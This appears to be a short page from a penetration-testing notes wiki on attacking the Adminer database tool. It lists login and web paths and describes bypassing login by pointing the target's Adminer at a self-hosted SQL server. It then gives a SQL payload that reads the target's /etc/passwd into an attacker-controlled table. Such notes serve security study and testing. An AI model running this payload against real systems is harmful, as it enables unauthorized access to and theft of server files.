search

adminer.php

hashtag
Login Page

/adminer.php

hashtag
Interesting Paths

/var/www/html/index.php

hashtag
Auth Bypass and LFI

Host own SQL server, connect via target to bypass login

link1arrow-up-right| link2arrow-up-right

Check PHPinfo
open_basedir /var/www/html => can only read files in this dir.

# LFI via SQL

load data local infile "/etc/passwd"
into table admirer.pwn
fields terminated by "\n";
PreviousadminLTENextcomment system

Last updated